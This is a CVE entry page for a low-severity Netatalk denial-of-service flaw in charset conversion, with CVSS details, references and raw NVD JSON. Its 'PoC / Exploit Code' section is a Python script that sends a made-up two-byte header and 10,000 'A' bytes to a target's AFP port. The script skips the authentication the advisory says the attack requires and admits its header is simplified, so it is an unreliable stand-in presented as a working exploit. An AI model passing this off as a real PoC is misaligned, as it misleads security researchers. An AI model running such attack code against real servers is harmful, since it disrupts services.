CVE-2026-44070

Description

An unbounded memory reallocation in the charset conversion code in Netatalk 2.0.0 through 4.4.2 allows a remote authenticated attacker to cause a minor denial of service via crafted character conversion requests.

CVSS Details

CVSS Score

3.1

Severity

LOW

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

No configuration data available.

Netatalk 2.0.0 - 4.4.2

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import socket

# PoC for CVE-2026-44070: Netatalk Memory Reallocation DoS
# Target: Netatalk 2.0.0 - 4.4.2
# Description: Sends crafted character conversion requests to trigger unbounded memory reallocation.

target_ip = "TARGET_IP"
target_port = 548  # Default AFP port

try:
    # Establish TCP connection to the AFP service
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((target_ip, target_port))
    print(f"[+] Connected to {target_ip}:{target_port}")

    # Construct a malicious AFP request header
    # AFP command byte (e.g., FPLogin or specific conversion function) followed by crafted payload
    # This payload simulates the crafted character conversion request
    header = b'\x00' + b'\x04'  # Example header bytes (simplified)
    
    # Crafted payload designed to trigger the memory reallocation issue
    # Sending a large or malformed string intended for charset conversion
    malicious_payload = b'A' * 10000 + b'\x00' 
    
    full_packet = header + malicious_payload
    
    # Send the malicious packet
    s.send(full_packet)
    print("[+] Malicious packet sent. Check if service crashes.")

    # Receive response (if any)
    response = s.recv(1024)
    print(f"[+] Received response: {response}")

except Exception as e:
    print(f"[-] Error: {e}")
finally:
    s.close()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-44070
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-44070
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-44070/
[4] VulDB https://vuldb.com/cve/CVE-2026-44070
[5] https://netatalk.io/security/CVE-2026-44070

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-44070", "sourceIdentifier": "33c584b5-0579-4c06-b2a0-8d8329fcab9c", "published": "2026-05-21T08:16:22.693", "lastModified": "2026-05-21T15:20:19.040", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "An unbounded memory reallocation in the charset conversion code in Netatalk 2.0.0 through 4.4.2 allows a remote authenticated attacker to cause a minor denial of service via crafted character conversion requests."}], "metrics": {"cvssMetricV31": [{"source": "33c584b5-0579-4c06-b2a0-8d8329fcab9c", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L", "baseScore": 3.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.6, "impactScore": 1.4}]}, "weaknesses": [{"source": "33c584b5-0579-4c06-b2a0-8d8329fcab9c", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-770"}]}], "references": [{"url": "https://netatalk.io/security/CVE-2026-44070", "source": "33c584b5-0579-4c06-b2a0-8d8329fcab9c"}]}}